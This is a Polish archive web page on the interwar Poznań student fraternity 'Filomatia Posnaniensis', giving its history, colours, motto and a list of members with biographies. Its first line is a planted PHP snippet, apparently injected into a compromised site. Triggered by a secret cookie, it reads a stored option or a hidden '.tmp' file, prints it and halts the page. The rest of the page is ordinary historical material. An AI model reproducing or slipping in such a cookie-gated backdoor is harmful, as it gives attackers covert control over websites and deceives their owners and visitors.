if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Filomatia Posnaniensis

Dekiel Filomatii Posnaniensis - vide Poszukiwania. Nazwa:
Korporacja Studentów Uniwersytetu Poznańskiego “Filomatia Posnaniensis”
Siedziba:
Poznań
Data powstania:
12 maja 1929 r.
Barwy:
heliotropowa – biała – karmazynowa (od 1935: granatowa – czerwona – złota)
Dewiza:
„Ojczyzna, Nauka, Cnota”

Rys historyczny

Dewizka Józefa Brencza z Filomatii Posnaniensis

Filomatia Posnaniensis została założona dnia 12 V 1929 r. Szczególnym celem korporacji miała być praca oświatowa, m.in. poprzez współpracę z Towarzystwem Szkoły Ludowej. Kuratorem korporacji z ramienia Uniwersytetu Poznańskiego został prof. Józef Kostrzewski.

Filomatia, Poznań 1931 r.

Od dnia 27 IV 1931 r. Filomatia należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 27 IV 1931 r.). Kandydowała pod opieką K! Baltia. W 1933 r. uzyskała prawa członka rzeczywistego Związku.

Ślub Filomaty, lata 30-te.

W 1935 r. połączyła się ze starszą, założoną dnia 13 XI 1925 r. K! Quiritia, która przeżywała trudności w związku ze spadkiem liczby członków. Filomatia zachowała swoją nazwę, ale przyjęła barwy i starszeństwo związkowe Quiritii (data starszeństwa związkowego Quiritii: 17 III 1927 r.).

Bal Filomatii, Poznań 15 I 1932 r.

Całkowita ustalona, niekompletna imienna lista członków Filomatii (oraz Quritii) obejmuje 71 nazwisk, w tym sześciu członków honorowych.

Brak wiadomości o powojennej działalności korporacji i spotkaniach jej członków.

Wieczorek taneczny Filomatii, Poznań 1933 r.

Lista członków

Poniższa, niekompletna lista członków Filomatii (i Quritii) obejmuje ponad 65 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

  Stanisław Celichowski.

 1. Stanisław Celichowski, (25 września 1885 w Bninie - 29 marca 1947 w Londynie) s. Zygmunta i Zofii z Ziemnych, brat Witolda (Helionia), absolwent Gimnazjum św. Marii Magdaleny w Poznaniu, dr praw Uniwersytet w Halle 1910, adwokat w Ostrowie Wielkopolskimi i Pleszewie, w 1918 organizator Rady Żołnierskiej w Kórniku, uczestnik Powstania Wielkopolskiego, w tym walk ulicznych w Poznaniu 27-29 grudnia 1918, dowodził wyzwalaniem Śremu, walkami pod Zbąszyniem, Strzyżewem, Łomnicą, Rawiczem, Zieloną Wsią, jako dowódca II batalionu 11. Pułku Strzelców Wielkopolskich kierował obroną odcinka Jutrosin-Krotoszyn-Odolanów, kierownik Wydziału Wojskowego w Ministerstwie b. Dzielnicy Pruskiej 1919-1920, po zamachu majowym Józefa Piłsudskiego w 1926 członek antysanacyjnej Organizacji Obrony Państwa oraz oboźny Obozu Wielkiej Polski na województwo poznańskie, członek Rady Naczelnej 1928-39 i Zarządu Głównego 1935-39 Stronnictwa Narodowego, z ramienia Stronnictwa Narodowego w poznańskim sejmiku wojewódzkim 1932-39, w 1938 wybrany na prezydenta Poznania (wyboru nie zatwierdziły zwierzchnie władze państwowe), działacz licznych organizacji społecznych, m.in. współzałożyciel i prezes Narodowego Zrzeszenia Adwokatów, wiceprezes Legionu Wielkopolskiego, Filister honorowy Filomatii Posnaniensis, prezes Koła Filistrów, w czasie II wojny światowej od 1941 w Wielkiej Brytanii, m.in. członek II Rady Narodowej 1942-43, podsekretarz stanu w Ministerstwie Odbudowy Administracji Publicznej, wykładowca prawa cywilnego na polskim wydziale prawa na Oxfordzie, po wojnie pozostał na emigracji, pochowany na katolickim Cmentarzu św. Marii w Kensal Green

 2. Stanisław Kostka Gładysz, (1865-1934) dr, kanonik honorowy poznańskiej Kapituły Metropolitalnej, długoletni proboszcz w Komornikach, dziekan dekanatu stęszewskiego

  Józef Kostrzewski, lata 30-te.

 3. Józef Kostrzewski, (25 lutego 1885 w Węglewie k. Gniezna - 19 listopada 1969 w Poznaniu) uczeń Królewskiego Gimnazjum w Ostrowie oraz Gimnazjum w Gnieźnie, członek organizacji samokształceniowych i patriotycznych, w tym m.in. Towarzystwo Tomasza Zana, student historii UJ, doktorat Uniwersytet w Berlinie, po I wojnie światowej prof. archeologii UP, kurator i Filister honorowy Filomatii Posnaniensis, członek korespondent 1928 i członek czynny 1935 PAU 1928, od 1957 członek rzeczywisty PAN, dr honoris causa UAM, UJ, Uniwersytetu Humboldta w Berlinie, odznaczony m.in. Krzyżem Oficerskim Legii Honorowej 1937 oraz Krzyżem Komandorskim Orderu Św. Grzegorza Wielkiego 1964, pochowany na przyparafialnym Cmentarzu na Smochowicach w Poznaniu

 4. Antoni Władysław Majorowicz, (8 stycznia 1883 w Brześciu Kujawskim - 1940 w Katyniu) s. Antoniego i Aleksandry z Jaraczewskich, student i absolwent farmacji Uniwersytet w Brunszwiku 1910, właściel Apteki im. Adama Mickiewicza w Poznaniu, prezes Polskiego Powszechnego Towarzystwa Farmaceutycznego w Poznaniu, Filister honorowy Filomatii Posnaniensis, kpt. rez., uczestnik wojny obronnej 1939, w niewoli sowieckiej w Starobielsku i Kozielsku, zamordowany przez NKWD
 5. Zygmunt Wojciechowski, (27 kwietnia 1900 w Stryju - 14 października 1955 w Poznaniu) s. Konstantyna i Leontyny z Buczkowskich, dr historii UJK 1924, asystent przy Zakładzie Nauk Pomocniczych Historii UJK, od 1925 zastępca prof. w Katedrze Historii Ustroju i Dawnego Prawa Polskiego na Wydziale Prawno-Ekonomicznym UP, habilitacja 1925, prof. nadzw 1929. UP, prof. zw. 1937, dziekan Wydziału Prawno-Ekonomicznego UP 1939, kierownik Wydziału Naukowego Delegatury Rządu RP na Kraj 1940-45, założyciel i pierwszy dyrektor Instytutu Zachodniego 1944-55, od 1945 członek PAU i od 1952 PAN, od 1984 patron Instytutu Zachodniego, Filister honorowy Filomatii Posnaniensis
 6. Witold Żuchowski, ksiądz, Ojciec Filomatii Posnaniensis

Członkowie rzeczywiści

 1. Aleksander Amberg, członek Quiritii, sekretarz sem. zim. 1928/29, prezes sem. let. 1928/29
 2. Werner Amberg, członek Quiritii, prezes sem. let. 1930/31
 3. Jan Barański, członek Quiritii
 4. Stanisław Bińczak, założyciel Filomatii Posnaniensis
 5. Zygfryd Bittner, sekretarz sem. let. 1937/38

  Józef Brencz, ok. 1933 r.

 6. Józef Brencz, (6 marca 1909 w Poznaniu - 27 grudnia 1989 w Poznaniu) s. Franciszka i Jadwigi z d. Kramer, absolwent Gimnazjum św. Jana Kantego w Poznaniu, student i absolwent prawa UP, sekretarz 1932, olderman 1932/33, prezes 1933 i sem. zim. 1933/34, wiceprezes Bratniej Pomocy Studentów UP 1935/36 i 1936/37, w czasie okupacji w konspiracji w AK w Ostrowcu Świętokrzyskim, po wojnie pracował w Państwowej Inspekcji Handlowej, dyrektor Miejskiego Handlu Detalicznego w Obornikach i Szamotułach, dyrektor Miejskiego Handlu Detalicznego Artykułami Chemicznymi w Poznaniu, kierownik WPHS w Poznaniu, pochowany na cmentarzu na Junikowie

 7. Wiktor Bujarski, (14 kwietnia 1908 w Próchnowie -2000) student i absolwent 1936 med. UP, dr med. UP 1947, po wojnie m.in. Kierownik Ośrodka Zdrowia w Kłecku k. Gniezna
 8. Chmielewski, założyciel Filomatii Posnaniensis, prawnik
 9. Roman Chudowicz, członek Quiritii
 10. Kiejstut Wojciech Downarowicz, członek Quiritii, wiceprezes sem. let. 1930/31

  Seweryn Dzieciuchowicz, ok. 1930 r. (?).

 11. Seweryn Dzieciuchowicz, (1910-1963) kuzyn Stanisława (Aesculapia), członek Quiritii

 12. Mieczysław Florczak, skarbnik sem. let. 1930/31

  Jan Gawroński, 1931 r.

 13. Jan Gawroński, (9 października 1908 w Dolsku -5 maja 1986 w Poznaniu) s. Stanisława i Filipiny, absolwent Gimnazjum w Dolsku, student i absolwent 1933 med. UP, założyciel Filomatii Posnaniensis, sekretarz sem. let. 1930/31, sekretarz 1931, prezes 1932, ppor. rez., w wojnie obronnej 1939 lekarz-dowódca plutonu sanitarnego w Armii “Pomorze”, w czasie okupacji lekarz w Jutrosinie, po wojnie kierownik Ośrodka Zdrowia w Jutrosinie 1946-70, radny Miejskiej Rady Narodowej w Jutrosinie 1956-64, pochowany na cmentarzu w Skórzewie k. Poznania

 14. Feliks Góral, wiceprezes sem. let. 1928/29

  Witold Górny, 1931 r.

 15. Witold Górny,(4 września 1907 w Nakle n. Notecią - 27 października 1997 w Warszawie) s. Józefa i Marii, szwagier Stefana (Lechia) i Antoniego (Chrobria), absolwent Gimnazjum w Brodnicy, student i absolwent 1933 med. UP, założyciel Filomatii Posnaniensis, prezes sem. let. 1930/31, 1931/32 i 1932, po studiach prowadził praktykę prywatną w Tczewie 1938-40, dermatolog i wenerolog, w czasie okupacji na Zamojszczyźnie, udzielał pomocy oddziałom partyzanckim AK, po wojnie dyrektor Szpitala św. Jerzego we Wrocławiu, ordynator Oddziału Dermatologii w Szpitalu Wojskowym we Wrocławiu, od 1955 do emerytury dyrektor Departamentu Służby Zdrowia w MSW, płk w stanie spoczynku, od 1960 pracował także jako dermatolog w Spółdzielni Lekarskiej “Vita” w Warszawie, działał społecznie w ruchu spółdzielczym i PCK, pochowany na cmentarzu w Wółce Węglowej w Warszawie

 16. Mieczysław Grabowski, członek Quiritii, skreślony 1919
 17. Zdzisław Jankowski, student chemii UP, sekretarz sem. zim. 1933/34
 18. Leszek Janowski, sekretarz 1931/32
 19. Kazimierz Kamiński, członek Quiritii, wiceprezes sem. let. 1927/28 (?)
 20. Paweł Kanczewski, członek Quiritii, prezes sem. zim. 1927/28, olderman sem. let. 1927/28 (?), prezes sem. zim. 1928/29, olderman sem. let. 1928/29, prezes Bratniej Pomocy WSH 1926/27

  Zygmunt Karolczak, 1933 r.

 21. Zygmunt Karolczak, (7 kwietnia 1907 w Dopiewie - 8 kwietnia 1988 w Gdyni) s. Jana (mistrza piekarskiego) i Aleksandry z Wąsowiczów, brat Stanisława Henryka (Lechia), absolwent Gimnazjum Humanistycznego w Bydgoszczy 1920-28, student i absolwent med. UP 1928-35 (dyplom 1936), [prawd. c. 1929 Baltia], założyciel Filomatii Posnaniensis, prezes 1932/33, po wojnie lekarz w Gdyni, ordynator oddziału wewnętrznego i zakaźnego w Chełmie Lubelskim 1938-39, od lata 1939 prowadził własną praktykę w Nakle, w czasie okupacji lekarz w Grudziądzu i Kościerzynie, a w końcu wysłany do Niemiec, po wojnie prowadził przychodnię lekarską przy polskim obozie w Osnabrück, od 1946 lekarz w Czersku, od 1983 na emeryturze, m.in. Przychodni Rejonowej PKP w Czersku oraz w Ośrodku Zdrowia, pochowany na Cmentarzu Witomińskim w Gdyni [Źródła (poza wskazanymi poniżej spisu członków): “Pół wieku lekarskiej służby”; relacja Gabriele Karolczak]

 22. Stanisław Kędracki, (1905-1982) wiceprezes 1932
 23. Brunon Paweł Klimek, (6 czerwca 1911 w Nowymdworze w pow. brodnickim - ) student i absolwent 1933 farmacji UP, skarbnik sem. zim. 1933/34, sekretarz 1934
 24. Józef Klupp, skarbnik sem. let. 1935/36, wiceprezes sem. let. 1936/37, prezes sem. let. 1937/38, działacz Obozu Radykalno-Narodowego
 25. Feliks Kopczyński, sekretarz sem. let. 1936/37
 26. Kornacki, założyciel Filomatii Posnaniensis
 27. Tadeusz Kraszewski, członek Quiritii, wiceprezes sem. zim. 1926/27, wiceprezes sem. zim. 1927/28, prezes sem. let. 1927/28 (?), członek poznańskiej Komisji Redakcyjnej “Wiadomości Korporacyjnych”
 28. Antoni Krzętowski, członek Quiritii
 29. Zbigniew Łukomski, członek Quiritii, sekretarz sem. zim. 1927/28
 30. Edmund Maciejewski, skarbnik sem. let. 1937/38

  Kazimierz Maciołek, lata 30-te.

 31. Kazimierz Maciołek, (3 stycznia 1910 w miejsc. Kozielsko w pow. Wągrowiec - 1 stycznia 1973 w Poznaniu) s. Walentego i Elżbiety z d. Kranz, absolwent Gimnazjum w Wągrowcu, student Wydziału Prawno-Ekonomicznego UP 1931-35, sekretarz Akademickiego Koła Pauczan 1931/32, i 1932/33, prezes 1934, po studiach pracownik administracji skarbowej, działał społecznie w PCK i samorzadach szkolnych, pochowany na Cmentarzu na Miłostowie w Poznaniu

 32. Tomasz Malinowski, członek Quritii, olderman sem. let. 1930/31
 33. Wacław Malinowski, członek Quiritii, olderman sem. zim. 1928/29 (?), prezes Koła Naukowego WSH 1926/27
 34. Władysław Makowski, członek Quritii, skarbnik sem. zim. 1926/27

  Antoni Małaszczyk, prawd. ok. 1935 r.

 35. Antoni Małaszczyk, ( - 1935) pochowany z ceremoniałem korporacyjnym w Poznaniu

 36. Henryk Markiewicz, ( - 1954 w Lesznie) założyciel Filomatii Posnaniensis, lekarz
 37. Mieczysław Mielżyński, (1906-1966) założyciel Filomatii Posnaniensis, lekarz

  Tadeusz Musierowicz, 1933 r.

 38. Tadeusz Musierowicz, (1906-1982) założyciel Filomatii Posnaniensis, wiceprezes sem. let. 1930/31, leśniczy

 39. Aleksander Orzechowski, członek Quiritii, prezes sem. zim. 1926/27
 40. Ryszard Orzechowski, ( - 1926) członek Quiritii, gospodarz sem. zim. 1926/27
 41. Marian Osiecki, członek Quiritii, sekretarz sem. let. 1928/29
 42. Felicjan Pluciński, członek Quiritii
 43. Wacław Ratajczak, sekretarz 1935, prezes sem. let. 1935/36
 44. Bolesław Rogoziński, założyciel Filomatii Posnaniensis, lekarz
 45. Tadeusz Rosol, założyciel Filomatii Posnaniensis, olderman sem. let. 1930/31, olderman 1931/32, członek Zarządu Bratniej Pomocy Studentów UP 1932/33, działacz Młodzieży Wszechpolskiej, lekarz, po wojnie na emigracji w Kanadzie
 46. Stanisław Sargalski, skarbnik sem. let. 1936/37, wiceprezes sem. let. 1937/38, prezes sem. let. 19/38/39
 47. Julian Schroeder, sekretarz 1932/33
 48. Alfons Sobolewski, założyciel Filomatii Posnaniensis, wiceprezes 1931/32, olderman 1932
 49. Franciszek Stachanowski, wiceprezes sem. let. 1935/36, wiceprezes sem. let. 1938/39
 50. Józef Suwalski, student medycyny UP, sekretarz sem. let. 1935/36, prezes sem. let. 1936/37
 51. Zenon Szymański, założyciel Filomatii Posnaniensis, prezes 1930, olderman sem. zim. 1931/32, lekarz, działacz harcerski, harcmistrz
 52. Roman Turski, student Wydziału Humanistycznego UP, wiceprezes 1934
 53. Antoni Tynecki (Tyszecki), członek Quiritii, sekretarz sem. zim. 1926/27
 54. Stanisław Tynecki (Tyszecki), członek Quiritii, olderman sem. zim. 1927/28, wiceprezes sem. zim. 1928/29, prezes sem. let. 1928/29 (od marca)
 55. Stanisław Wawrzyniak, student Wydziału Prawno-Ekonomicznego UP
 56. Stefan Wieloch, student rolnictwa UP
 57. Piotr Winiarski, wiceprezes sem. let. 1938/39
 58. Wacław Zdziernicki, członek Quiritii, sekretarz sem. let. 1927/28 (?)
 59. Benon Henryk Zieliński, ( - 1936) student chemii UP, wiceprezes sem. zim. 1933/34, prezes 1934/35 i 1935, zginął tragicznie
 60. Eryk Zieliński, członek Quiritii
 61. Dariusz Żebrowski, student medycyny UP
 62. Zbigniew Żebrowski, założyciel Filomatii Posnaniensis, prawnik
 63. Marian Żołnierkiewicz, członek Quiritii, c. 1928 (?), akt. 1928-29, wystąpił 1929
 64. Witold Żuchowski, sekretarz sem. let. 1938/39
 65. Wiktor Żychowicz, członek Quiritii

Listę członków opracowano na podstawie:

1) K. A. Tyszka, Lista członków Polskiej Korporacji Akademickiej Filomatia Posnaniensis (Poznań), (w:) Polskie Korporacje Akademickie 1997, nr 14, s. 110 i n.,
2) materiałów archiwalnych z Archiwum Korporacyjnego,
3) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Filomatia Posnaniensis.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 5 X 2010 r.
Ostatnia zmiana: 19 I 2015 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Studentów Uniwersytetu Poznańskiego “Filomatia Posnaniensis”, (na:) www.archiwumkorporacyjne.pl, stan 19 I 2015 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }